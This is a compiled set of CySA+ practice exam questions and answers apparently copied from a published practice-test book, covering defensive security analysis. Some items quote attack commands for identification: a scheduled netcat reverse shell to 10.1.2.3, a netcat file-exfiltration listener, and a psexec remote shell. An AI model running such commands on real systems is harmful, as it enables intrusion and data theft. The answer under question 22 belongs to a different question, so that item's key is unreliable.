CySA 3 test question

48. A system that Carlos is responsible for has been experiencing consistent denial of service attacks using a version of the Low Orbit Ion Cannon (LOIC), which leverages personal computers in a concerted attack by sending large amounts of traffic from each system to flood a server, thus making it unable to respond to legitimate requests. What type of firewall rule should Carlos use to limit the impact of a tool like this if bandwidth consumption from the attack itself is not the root problem? A. IP-based blacklisting B. Dropping all SYN packets C. Using a connection rate or volume-limiting filter per IP D. Using a route-blocking filter that analyzes common LOIC routes

"C. Since LOIC can leverage hundreds or thousands of hosts, limiting each connecting host to a connection rate and volume through filters like those provided by the iptables hashlimit plug-in can help. IP-based blacklisting may work for smaller botnets, but it is difficult to maintain for larger attacks and may eventually block legitimate traffic. Dropping all SYN packets would prevent all TCP connections, and route-blocking filters are not a method used to prevent this type of attack. While he's setting up firewall rules, Carlos may also want to investigate a denial-of-service mitigation partner or service in case the attackers move to more advanced methods or do overwhelm his link.

34. "The ATT&CK framework defines which of the following as "the specifics behind how the adversary would attack the target"? A. The threat actor B. The targeting method C. The attack vector D. The organizational weakness

"C. The ATT&CK framework defines the attack vector as the specifics behind how the adversary would attack the target. You don't have to memorize ATT&CK to pass the exam, but you should be prepared to encounter questions that you need to narrow down based on what knowledge you do have. Here you can rule out the threat actor and targeting method, and then decide between the attack vector and organizational weakness.

3. "Abul wants to identify typical behavior on a Windows 10 system using a built-in tool to understand memory, CPU, and disk utilization. What tool can he use to see both real-time and performance over a period of time? A. sysmon B. sysgraph C. resmon D. resgraph

"C. The Windows Resource Monitor application is a useful tool to both see real-time data and graph it over time, allowing Abul to watch for spikes and drops in usage that may indicate abnormal behavior.

15. "Ian wants to capture information about privilege escalation attacks on a Linux system. If he believes that an insider is going to exploit a flaw that allows them to use sudo to assume root privileges, where is he most likely to find log information about what occurred? A. The sudoers file B. /var/log/sudo C. /var/log/auth.log D. root's .bash_log

"C. The auth.log file on Linux systems will capture sudo events. A knowledgeable attacker is likely to erase or modify the auth.log file, so Ian should make sure that the system is sending these events via syslog to a trusted secure host. The sudoers file contains details of which users can use sudo and what rights they have. There is not a file called /var/log/sudo, and root's .bash_log file might contain commands that root has run but won't have details of the sudo event—there's no reason for root to sudo to root!

67. "Angela wants to block traffic sent to a suspected malicious host. What iptables rule entry can she use to block traffic to a host with IP address 10.24.31.11? A. iptables -A OUTPUT -d 10.24.31.11 -j DROP B. iptables -A INPUT -d 10.24.31.11 -j ADD C. iptables -block -host 10.24.31.11 -j DROP D. iptables -block -ip 10.24.31.11 -j ADD

"A. Adding an iptables entry uses the -A flag to add to a list. Here, we can safely assume that OUTPUT is the outbound ruleset. The -d flag is used to designate the IP address or subnet range, and -j specifies the action, DROP.

94. James wants to use an automated malware signature creation tool. What type of environment do tools like this unpack and run the malware in? A sandbox A physical machine A container A DMARC.

"A. Automated malware analysis tools use a secure and instrumented sandbox environment to unpack and run malware so that they can observe and record actions taken by the malware. This is used to perform behavioral analysis as well as to generate file fingerprints and other elements of unique malware signatures." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

101. Naomi wants to analyze malware by running it and capturing what it does. What type of tool should she use? A containerization tool A virtualization tool A sandbox tool A packet analyzer

"C. The best option for Naomi is a dedicated sandbox tool like Sandboxie or a cloud service sandbox like app.run.any. They are designed to isolate the malware while providing instrumentation to capture and analyze the results of the malware execution. Manually building a virtualization environment is a possibility but requires a lot of work to instrument and build tools to analyze the malware. A containerization tool is best suited to app deployment, and a packet analyzer is useful for looking at network traffic.

26. While reviewing email headers, Saanvi notices an entry that reads: From: "John Smith, CIO" <[email protected]> with a Received: parameter that shows mail.demo.com [10.74.19.11]. Which of the following scenarios is most likely if demo.com is not a domain belonging to the same owner as example.com? A. John Smith's email was forwarded by someone at demo.com. B. John Smith's email was sent to someone at demo.com. C. The headers were forged to make it appear to have come from John Smith. D. The mail.demo.com server is a trusted email forwarding partner for example.com.

"C. The most likely scenario in this circumstance is that the headers were forged to make the email appear to come from example.com, but the email was actually sent from mail.demo.com.

64. Kaitlyn's organization recently set a new password policy that requires that all passwords have a minimum length of 10 characters and meet certain complexity requirements. She would like to enforce this requirement for the Windows systems in her domain. What type of control would most easily allow this? A. Group Policy Object B. Organizational unit C. Active Directory forest D. Domain controller

"A. Group Policy Objects (GPOs) are used to enforce security and configuration requirements within Active Directory. Active Directory forests and organizational units (OUs) are designed to organize systems and users hierarchically and do not directly allow security configurations, although GPOs may be applied to them. Domain controllers (DCs) are the servers that are responsible for providing Active Directory Domain Services to the organization and would be the point for applying and enforcing the GPO.

62. Tracy is validating the web application security controls used by her organization. She wants to ensure that the organization is prepared to conduct forensic investigations of future security incidents. Which one of the following OWASP control categories is most likely to contribute to this effort? A. Implement logging B. Validate all inputs C. Parameterize queries D. Error and exception handling

"A. Logging of application and server activity may provide valuable evidence during a forensic investigation. The other three controls listed are proactive controls designed to reduce the risk of an incident occurring and are less likely to directly provide information during a forensic investigation.

71. "What type of attack does a network administrator need to be aware of when deploying port security? A. MAC address spoofing B. IP address spoofing C. Denial-of-service attacks D. ARP spoofing

"A. MAC address spoofing or cloning will allow a system to easily bypass port security because port security only relies on MAC address verification to decide which systems can connect to a given network port.

7. "Ben is reviewing network traffic logs and notices HTTP and HTTPS traffic originating from a workstation. What TCP ports should he expect to see this traffic sent to under most normal circumstances? A. 80 and 443 B. 22 and 80 C. 80 and 8088 D. 22 and 443

"A. Most common HTTP traffic will go to port 80, and HTTPS traffic will go to 443. The third most common port for web traffic is 8080, and would be a reasonable if significantly less common option. While other ports may be in use, if you aren't expecting traffic to nonstandard HTTP and HTTPS ports you may want to investigate the traffic." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

36. "Lisa is aware that multiple members of her organization fell for a phishing attack. What attack vector should she worry about based on this? A. Compromised credentials B. Malicious insiders C. Ransomware D. Brute-force

"A. Phishing attacks typically target credentials, so Lisa should focus on how to identify what credentials were exposed, how to prevent compromised credentials from causing problems, and how to reduce the likelihood of future successful phishing attacks. At the same time, she will need to monitor for use of the compromised credentials!

"27. Corbin wants to prevent attackers from bypassing port security on his network's edge devices. What technique are attackers most likely to use to try to bypass it? A. Spoofing MAC addresses B. Providing valid credentials C. Spoofing IP addresses D. Providing fake credentials

"A. Port security relies on MAC addresses to filter which systems are allowed to connect to the port, which means that Corbin needs to consider how to prevent MAC spoofing.

84. "What is the Security Content Automation Protocol used for? Assessing configuration compliance Testing for sensitive data in transit Testing for sensitive data at rest Assessing threat levels

"A. SCAP (Security Content Automation Protocol) is a set of specifications that define how to exchange security automation content used to assess configuration compliance. It can also be used to detect vulnerable versions of software." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

30. "Users are reporting that inbound mail is not reaching their accounts. Chris believes that rule 1 should provide this access. The organization's SMTP server is located at 10.15.1.1. What component of this rule is incorrect? A. Protocol B. Source port C. Destination IP D. Destination port

"A. The only error in this rule is the protocol. SMTP does run on port 25, and inbound connections should be accepted from any port and IP address. The destination IP address (10.15.1.1) is correct. However, SMTP uses the TCP transport protocol, not UDP.

61. "Deepa wants to see the memory utilization for multiple Linux processes all at once. What command should she run? A. top B. ls -mem C. mem D. memstat

"A. The top command provides a real-time view of the memory usage for a system on a per-process basis. The ls command does not work for memory; mem was made up for this question; and memstat is used to check the state of memcached servers, and it won't help in this circumstance. If you're not familiar with basic Linux commands like top, you should spend some time with a Linux system as you prepare for the CySA+ exam. A basic understanding of common commands can be very helpful.

92. Jennifer wants to search for terms including "CySA+" and all other variations of the text regardless of which letters may be capitalized. Which of the following commands will find all the terms that match what she is searching for in a text file named example.txt? grep -i cysa+ example.txt grep -uc CySA+ example.txt grep -case cysa+ example.txt grep example.txt cysa+

"A. When you use grep with the -i flag, it performs a case-insensitive search. Neither -uc nor -case is a valid flag for this, and the search term comes before the filename, which means grep example.txt cysa+ will attempt to search a file named cysa+ for the example.txt phrase.

38. What type of attack is a back-off algorithm intended to limit or prevent? A. Denial-of-service attacks B. Brute-force attacks C. Compromised credential-based attacks D. Trojans

"B. Brute-force attacks rely on the ability to make multiple attempts to log in, access a service, or otherwise allow probes. A back-off algorithm can limit or prevent this by ensuring that only a limited number of attempts are possible before delays or a timed lockout occurs.

55. "While analyzing a malware package, Ryan finds a list of hostnames shown here: earnestnessrealsitetest.com rvcxestnessrealsitetest.com hjbtestnessrealsitetest.com agekestnessrealsitetest.com sgjxestnessrealsitetest.com igjyestnessrealsitetest.com zxahestnessrealsitetest.com zfrpestnessrealsitetest.com hdquestnessrealsitetest.com umcuestnessrealsitetest.com hrbyestnessrealsitetest.com ysrtestnessrealsitetest.com kgteestnessrealsitetest.com hfsnestnessrealsitetest.com njxfestnessrealsitetest.com What has he likely found in the malware package? A. A RPG B. A DGA C. A SPT D. A FIN

"B. Domain names like those listed are a common sign of a domain generation algorithm (DGA), which creates procedurally generated domain names for malware command and control hosts.

5. "How is integrated intelligence most commonly used in a firewall system? A. The firewall searches for new IPs to block and creates a STIX feed entry. B. The intelligence feed provides firewall rules that are implemented on the firewall in real time. C. Threat intelligence is used to provide IP information for rules. D. Named threat actors are blocked based on their threat level and resource model.

"C. Threat intelligence feeds may be used to build rules, however unlike option B, threat feeds typically aren't used to build rules in real time for firewall devices. Firewalls typically do not analyze their own logs and build STIX feed entries, nor do they know about threat actor names, resources, and threat levels.

57. "Chris operates the point-of-sale (POS) network for a company that accepts credit cards and is thus required to be compliant with PCI DSS. During his regular assessment of the POS terminals, he discovers that a recent Windows operating system vulnerability exists on all of them. Since they are all embedded systems that require a manufacturer update, he knows that he cannot install the available patch. What is Chris's best option to stay compliant with PCI DSS and protect his vulnerable systems? A. Replace the Windows embedded point of sale terminals with standard Windows systems B. Build a custom operating system image that includes the patch C. Identify, implement, and document compensating controls D. Remove the POS terminals from the network until the vendor releases a patch

"C. When a vulnerability exists and a patch has not been released or cannot be installed, compensating controls can provide appropriate protection. In the case of PCI DSS (and other compliance standards), documenting what compensating controls were put in place and making that documentation available is an important step for compliance.

89. Carol wants to analyze email as part of her antispam and antiphishing measures. Which of the following is least likely to show signs of phishing or other email-based attacks? The email's headers Embedded links in the email Attachments to the email The email signature block

"D. Although the CySA+ exam includes email signatures in the list of items you may want to analyze, the same techniques are used to analyze the entire body of an email for malicious links and payloads. Header data is often checked against IP reputation databases and other checks that can help limit email from spam domains and known malicious senders. Signature blocks, however, are not typically a primary analysis tool." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

82. "Which of the following is not a limitation of a DNS sinkhole? They do not work on traffic sent directly to an IP address. They do not prevent malware from being executed. They can be bypassed using a hard-coded DNS server. They cannot block drive-by-download attempts.

"D. DNS sinkholes can block many types of drive-by downloads by preventing systems from connecting to malicious sites. DNS sinkholes do have limitations: they only work when a DNS query occurs, which means that some malware uses IP addresses directly to avoid them. They also can't stop malware from being executed, and of course malware could use a hard-coded DNS server instead of the organization's DNS server." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

11. "Disabling unneeded services is an example of what type of activity? A. Threat modeling B. Incident remediation C. Proactive risk assessment D. Reducing the threat attack surface area

"D. Disabling unneeded or risky services is an example of a strategy to reduce the attack surface area of a system or device. Threat modeling and proactive risk assessment are both activities that focus on preparation, rather than direct systems or technology action, and incident remediation might involve disabling a service, but there isn't enough information to know this for sure. What we do know for sure is that disabling unneeded services reduces the attack surface area for a system.

58. Mateo is responsible for hardening systems on his network, and he discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems? A. Enable host firewalls B. Install patches for those services C. Turn off the services for each appliance D. Place a network firewall between the devices and the rest of the network

"D. Mateo's only sure bet to prevent these services from being accessed is to put a network firewall in front of them. Many appliances enable services by default, since they are appliances they may not have host firewalls available to enable. They also often don't have patches available, and many appliances do not allow the services they provide to be disabled or modified.

32. "Rule 4 is designed to allow SSH access from external networks to the server located at 10.15.1.3. Users are reporting that they cannot access the server. What is wrong? A. The protocol is incorrect. B. The rules are misordered. C. The destination port is incorrect. D. There is no error in the rule, and Chris should check for other issues.

"D. Rule 4 is correctly designed to allow SSH access from external networks to the server located at 10.15.1.3. The error is not with the firewall rulebase, and Chris should search for other causes.

81. "Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file? grep more less strings

"D. The strings command extracts strings of printable characters from files, allowing Ben to quickly determine the contents of files. Grep would require knowing what he is looking for, and both more and less will simply display the file, which is often not a useful strategy for binaries." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

77. "Charles wants to determine if a message he received was forwarded by analyzing the headers of the message. How can he determine this? Reviewing the Message-ID to see if it has been incremented Checking for the In-Reply-To field Checking for the References field You cannot determine if a message was forwarded by analyzing the headers.

"D. When an email is forwarded, a new message with a new Message-ID header will be created. The In-Reply-To and References field will also be set as normal. The best option that Charles has is to look for clues like a subject line that reads "FWD"—something that is easily changed." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

49. Eleanor is using the US-CERT NCISS observed activity levels to assess threat actor activity. If she has systems with active ransomware infections that have encrypted data on the systems but the systems have available and secure backups, at what level should she rate the observed activity? A. Prepare B. Engage C. Presence D. Effect

"D. While the infection may not cause the business to lose data, there is an effect as systems must be restored and investigation will need to be done to determine if data was lost in addition to being encrypted in place.

23. While reviewing Windows event logs for a Windows 10 system with reported odd behavior, Kai discovers that the system she is reviewing shows Event ID 1005 MALWAREPROTECTION_SCAN_FAILED every day at the same time. What is the most likely cause of this issue? A. The system was shut down. B. Another antivirus program has interfered with the scan. C. The user disabled the scan. D. The scan found a file it was unable to scan.

"B. First, Kai should check the scan log to review the scan type and error code to check it via the Microsoft support site. The most likely cause from the list of provided answers is a conflict with another security product. While security practitioners often worry about malware on systems, a common cause of scan failures is a second installed antivirus package. If Kai doesn't find a second antivirus package installed, she should conduct a scan using another tool to see if malware may be the issue. .

53. "Henry configures his next-generation firewall (NGFW) security device to forge DNS responses for known malicious domains. This results in users who attempt to visit sites hosted by those domains to see a landing page that Henry controls, which advises them they were prevented from visiting a malicious site. What is this technique known as? A. DNS masquerading B. DNS sinkholing C. DNS re-sequencing D. DNS hierarchy revision

"B. Henry's implementation is a form of DNS sinkholing, which sends traffic to an alternate address that acts as the sinkhole for traffic that would otherwise go to a known bad domain.

100. "Fred has been tasked with configuring his organization's NAC rules to ensure that employees only have access that matches their job functions. Which of the following NAC criteria are least suited to filtering based on a user's job? Time-based Rule-based Role-based Location-based

"B. NAC solutions that implement employee job function-based criteria often use time-based controls to ensure that employees only have access when they are supposed to be working, role-based criteria due to their duties, and location-based rules to ensure that they only access networks where they work. Rule-based criteria typically focus on system health and configuration, thus focusing more on the computer or software than the user." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

79. "Susan wants to check a Windows system for unusual behavior. Which of the following persistence techniques it not commonly used for legitimate purposes too? Scheduled tasks Service replacement Service creation Autostart registry keys

"B. Scheduled tasks, service creation, and autostart registry keys are all commonly found on Windows systems for legitimate purposes. Replacing services is far less common unless a known upgrade or patch has occurred." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

1. James uploads a file that he believes is potentially a malware package to VirusTotal and receives positive results, but the file is identified with multiple different malware package names. What has most likely occurred? A. The malware is polymorphic and is being identified as multiple viruses because it is changing. b. Different antimalware engines call the same malware package by different names. C. VirusTotal has likely misidentified the malware package, and this is a false positive. D. The malware contains multiple malware packages, resulting in the matches.

"B. Sites like VirusTotal run multiple antimalware engines, which may use different names for malware packages. This can result in a malware package apparently matching multiple different infections.

73. "Syd inputs the following command on a Linux system: #echo 127.0.0.1 example.com>> /etc/hosts What has she done? A. She has added the system to the allowed hosts file. B. She has routed traffic for the example.com domain to the local host. C. She has routed local host traffic to example.com. D. She has overwritten the hosts file and will have deleted all data except this entry.

"B. Syd has added an entry to the hosts file that routes all traffic for example.com to her local address. This is a useful technique to prevent a system from contacting a malicious host or domain, or to simply prevent a nontechnical user from visiting specific sites or domains.

25. "Gabby executes the following command. What is she doing? ps -aux | grep apache2 | grep root A. Searching for all files owned by root named apache2 B. Checking currently running processes with the word apache2 and root both appearing in the output of top C. Shutting down all apache2 processes run by root D. There is not enough information to answer this question.

"B. The ps utility lists currently running processes, and aux are a set of flags that control which processes are selected. This output is then piped to grep, and all lines with the text apache2 will be selected. Then that list will be searched for the text root. This type of multiple piping can help quickly process large volumes of files and thousands or millions of lines of text.

59. "Michelle runs the following grep command. What text will it match? grep -i example *.txt A. All text files in the current directory with the word example in it B. All occurrences of the text example in all files in the current directory with a .txt extension C. All occurrences of the lowercase text example in all files in the current directory with a .txt extension D. All TXT files with a filename including the word example in the current directory and all subdirectories

"B. This command uses the -i flag, which means it will ignore the case of the text. That means that grep will search all files with a .txt extension for any occurrences of example, regardless of the case or other letters around it.

17. "What type of information can Gabby determine from Tripwire logs on a Linux system if it is configured to monitor a directory? A. How often the directory is accessed B. If files in the directory have changed C. If sensitive data was copied out of the directory D. Who has viewed files in the directory

"B. Tripwire can monitor files and directories for changes, which means Gabby can use it to monitor for files in a directory that have changed. It will not tell you how often the directory is accessed, who viewed files, or if sensitive data was copied out of the directory.

13. "Angela wants to prevent buffer overflow attacks on a Windows system. What two built-in technologies should she consider? A. The memory firewall and the stack guard B. ASLR and DEP C. ASLR and DLP D. The memory firewall and the buffer guard

"B. Windows has support for both DEP (data execution prevention) and ASLR (address space location randomization). These combine to help prevent buffer overflows by preventing items in memory location tagged as data from being executed and by randomizing the memory space Windows uses to make it harder to take advantage of known memory locations with an overflow.

60. Pranab is implementing cryptographic controls to protect his organization and would like to use defense-in-depth controls to protect sensitive information stored and transmitted by a web server. Which one of the following controls would be least suitable to directly provide this protection? A. TLS B. VPN C. DLP D. FDE

"C. A data loss prevention (DLP) system may be able to intercept and block unencrypted sensitive information leaving the web server, but it does not apply cryptography to web communications. Transport Layer Security (TLS) is the most direct approach to meeting Pranab's requirement, as it encrypts all communication to and from the web server. Virtual private networks (VPNs) may also be used to encrypt network traffic, adding a layer of security. Full-disk encryption (FDE) may also be used to protect information stored on the server in the event the disk is stolen.

88. "Bruce wants to integrate a security system to his SOAR. The security system provides real-time query capabilities, and Bruce wants to take advantage of this to provide up-to-the-moment data for his SOAR tool. What type of integration is best suited to this? CSV Flat file API Email

"C. API-based integrations allow a SOAR environment to send queries as required for the data they need. Flat files and CSVs can be useful when there is no API, or when there isn't support for the API in an environment, and real-time integration is not required. Email integrations can result in delays as email delivery is not done at a guaranteed speed and can require additional parsing and processing to extract information. Although it isn't in the list here, Bruce might consider a direct database connection if he was unable to use an API and wanted real-time data." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

85. Damian has discovered that systems throughout his organization have been compromised for over a year by an attacker with significant resources and technology. After a month of attempting to fully remove the intrusion, his organization is still finding signs of compromise despite their best efforts. How would Damian best categorize this threat actor? Criminal Hacktivist APT Unknown

"C. Damian has likely encountered an advanced persistent threat (APT). They are characterized as extremely well resourced actors whose compromises typically have an extended dwell time and the ability to scale capabilities to counter defenders over time. " Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

91. "Ric is working on reverse-engineering a malware sample and wants to run the binary but also control the execution as it occurs. What type of tool should he select for this? A disassembler A decompiler A debugger An unpacker

"C. Debuggers allow you to control the execution of a program by setting breakpoints, changing input data and variables, and otherwise controlling the execution of the program. Disassemblers and decompilers can provide insight into the code of a binary (either source code or assembly code), whereas an unpacker helps remove compression or encryption used to help obfuscate the code itself." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

75. "What does EDR use to capture data for analysis and storage in a central database? A. A network tap B. Network flows C. Software agents D. Hardware agents

"C. Endpoint detection and response (EDR) tools use software agents to monitor endpoint systems and to collect data about processes, user and system activity, and network traffic, which is then sent to a central processing, analysis, and storage system.

18. "While reviewing systems she is responsible for, Charlene discovers that a user has recently run the following command in a Windows console window. What has occurred? psexec \\10.0.11.1 -u Administrator -p examplepw cmd.exe A. The user has opened a command prompt on their workstation. B. The user has opened a command prompt on the desktop of a remote workstation. C. The user has opened an interactive command prompt as administrator on a remote workstation. D. The user has opened a command prompt on their workstation as Administrator.

"C. Even if you're not familiar with the PS tools, you can use your knowledge of Windows command line tools to figure out what is happening here. We see a remote workstation (it is highly unlikely you would connect to your own workstation this way!) indicated by the \\ip.address, a -u flag likely to mean userID with administrator listed, and a -p for password. We know that cmd.exe is the Windows command prompt, so it is reasonable and correct to assume that this will open a remote command prompt for interactive use. If this is a user who isn't an administrator, Charlene needs to start an incident investigation right away.

97. "Singh wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use SSH? Add an iptables rule blocking root logins Add root to the sudoers group Change sshd_config to deny root login Add a network IPS rule to block root logins

"C. Fortunately, the sshd service has a configuration setting called PermitRootLogin. Setting it to no will accomplish Singh's goal.

42. "Alex needs to deploy a solution that will limit access to his network to only authorized individuals while also ensuring that the systems that connect to the network meet his organization's patching, antivirus, and configuration requirements. Which of the following technologies will best meet these requirements? A. Whitelisting B. Port Security C. NAC D. EAP

"C. NAC (Network Access Control) can combine user or system authentication with client-based or clientless configuration and profiling capabilities to ensure that systems are properly patched, configured, and are in a desired security state. Whitelisting is used to allow specific systems or applications to work, port security is a MAC address filtering capability, and Extensible Authentication Protocol (EAP) is an authentication protocol.

44. "While analyzing a malware file that she discovered, Tracy finds an encoded file that she believes is the primary binary in the malware package. Which of the following is not a type of tool that the malware writers may have used to obfuscate the code? A. A packer B. A crypter C. A shuffler D. A protector

"C. Packers, or runtime packers, are tools that self-extract when run, making the code harder to reverse-engineer. Crypters may use actual encryption or simply obfuscate the code, making it harder to interpret or read. Protectors are software that is intended to prevent reverse engineering and often include packing and encryption techniques as well as other protective technologies. Shufflers were made up for this question.

14. Isaac is reviewing an organization's network security controls and discovers that port security has been enabled to control which systems can connect to network ports. Which of the following technologies should he recommend instead to help avoid the weaknesses that port security has in its security model? A. 802.1x B. DMARC C. SPF D. 802.3

A. Isaac should recommend 802.1x, the standard for port-based network access control. Both DMARC and SPF are email security standards, and 802.3 is the specification for Ethernet, but it isn't a security standard.

65. "Eric wants to send an email using a digital signature to ensure that the recipient can prove that the email was sent by him and that the content has not changed. What technology is frequently used for this? A. S/MIME B. IMAP C. DKIM D. TLS

A. Secure/Multipurpose Internet Mail Extensions (S/MIME) is standard for encryption and signing that has been implemented for many email platforms. If his email client and the recipient's email client both support it, Eric can digitally sign his email to prove that he sent it and that the content has not been changed.

19. "Brian writes a Snort rule that reads Alert tcp any -> 10.10.11.0/24 3306 What type of traffic will he detect? A. MySQL traffic B. RDP traffic C. LDAP traffic D. BGP traffic

A. TCP port 3306 is a common service port for MySQL. If you are asked to review rules for an IPS, IDS, firewall, or other service and do not know the rule syntax, look for what you do know. Here you can tell direction -> and that the alert would look for traffic from any system on any port to systems in the 10.10.11.0/24 network range on port 3306." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

39. Ian wants to leverage multiple threat flows, and he knows that using a standardized threat information format would help. What threat information standards should he look for from his feed providers to maximize compatibility between his information sources? A. STIX and TAXII B. SAML and OCSP C. STIX and CAB D. SAML and TAXII"

A. The Structured Threat Information Expression language (STIX), and TAXII, the protocol used to transfer threat intelligence, are open protocols that have been adopted to allow multiple threat sources to be combined effectively. SAML is Security Assertion Markup Language, OCSP is Online Certificate Status Protocol, and CAB was made up for this question.

98. "Azra's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command. at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe What does it do? It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30. It uses the AT command to dial a remote host via NetBIOS. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30. It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

A. The at command can be used to schedule Windows tasks. This task starts netcat as a reverse shell using cmd.exe via port 443 every Friday at 8:30 p.m. local time. Azra should be concerned, as this allows traffic in that otherwise might be blocked." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

31. The firewall rule creators intended to block access to a website hosted at 10.15.1.2 except from hosts located on the 10.20.0.0/16 subnet. However, users on that subnet report that they cannot access the site. What is wrong? A. The protocol is incorrect. B. The rules are misordered. C. The source port is not specified. D. There is no error in the rule, and Chris should check for other issues.

B. Chris can correct this error by switching the positions of rules 2 and 3. Rule 3, which permits access from the 10.20.0.0/16 subnet, will never be triggered because any traffic from that subnet also matches rule 2, which blocks it.

74. "While reviewing output from the netstat command, John sees the following output. What should his next action be? [minesweeper.exe] TCP 127.0.0.1:62522 dynamo:0 LISTENING [minesweeper.exe] TCP 192.168.1.100 151.101.2.69:https ESTABLISHED A. Capture traffic to 151.101.2.69 using Wireshark B. Initiate the organization's incident response plan C. Check to see if 151.101.2.69 is a valid Microsoft address D. Ignore it; this is a false positive.

B. John has discovered a program that is both accepting connections and has an open connection, neither of which are typical for the Minesweeper game. Attackers often disguise trojans as innocuous applications, so John should follow his organization's incident response plan.

33. Amanda has been assigned to reduce the attack surface area for her organization, and she knows that the current network design relies on allowing systems throughout her organization to access the Internet directly via public IPs they are assigned. What should her first step be to reduce her organization's attack surface quickly and without large amounts of time invested? A. Install host firewalls on the systems B. Move to a NAT environment C. Install an IPS D. None of the above

B. Moving to a NAT environment will make the systems inaccessible from the outside world, massively reducing the organization's attack surface. Installing host firewalls would be a great second step, but could involve significant amounts of work to install and tune the firewalls." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

6. What does execution of wmic.exe, powershell.exe, or winrm.vbs most likely indicate if you discover one or more was run on a typical end user's workstation? A. A scripted application installation B. Remote execution of code C. A scripted application uninstallation D. A zero-day attack"

B. PowerShell, wmic, and winrm.vbs are all commonly used for remote execution of code or scripts, and finding them in use on a typical workstation should cause you to be worried as most users will never use any of the three." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

22. While reviewing tcpdump data, Kwame discovers that hundreds of different IP addresses are sending a steady stream of SYN packets to a server on his network. What should Kwame be concerned is happening? A. A firewall is blocking connections from occurring B. An IPS is blocking connections from occurring C. A SYN flood D. An ACK blockage

B. Sadiq should place his IPS at point B. The firewall will filter out large amounts of unnecessary traffic, reducing the load on the IPS, and the IPS will see the largest amount of untrusted traffic at this location without de-aligning with the increased load that it would face outside the firewall.

102. "While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command: nc -l -p 43501 < example.zip What happened? The user set up a reverse shell running as example.zip. The user set up netcat as a listener to push example.zip. The user set up a remote shell running as example.zip. The user set up netcat to receive example.zip." Excerpt From CompTIA CySA+ Practice Tests Mike Chapple & David Seidl https://books.apple.com/us/book/comptia-cysa-practice-tests/id1530277812 This material may be protected by copyright.

B. The - l flag is a key hint here, indicating that netcat was set up as a listener. Any connection to port 43501 will result in example.zip being sent to the connecting application. Typically, a malicious user would then connect to that port using netcat from a remote system to download the file."

2. "Isaac wants to monitor live memory usage on a Windows system. What tool should he use to see memory usage in a graphical user interface? A. MemCheck B. Performance Monitor C. WinMem D. top

B. The Windows Performance Monitor provides a live view of memory usage per running application or service. This can be useful for live memory analysis. MemCheck and WinMem were made up for this question, and top is a useful Linux tool for checking memory utilization. If you aren't familiar with tools like this, you may want to spend some time with Windows and Linux common command cheat sheets like the Linux sheet found at www.linuxtrainingacademy.com/linux-commands-cheat-sheet/."

40. "Cassandra is documenting a threat actor using the STIX 2.0 standard, and she describes the threat actor as wanting to steal nuclear research data. What type of label would this receive in the STIX taxonomy? A. An alias B. A goal C. Their sophistication D. Their resource level

B. The thing that a threat actor wants to do is a goal in the STIX 2.0 taxonomy. Since you're unlikely to have memorized the taxonomy, when you encounter a question like this you should rule out what you can. Most questions will have one or more obviously incorrect answers—here that's likely their resource level and their alias. If you only ruled those two out, you'd have a 50 percent chance of getting a question like this right. In this case, you can likely then guess that wanting to steal nuclear research data is a goal and move on with the next question.

20. "What technology tracks endpoint user and entity behaviors, centralizes that data as well as other security data, and then uses statistical models to detect unusual behavior and notify administrators? A. An IPS B. UEBA C. An IDS D. DMARC

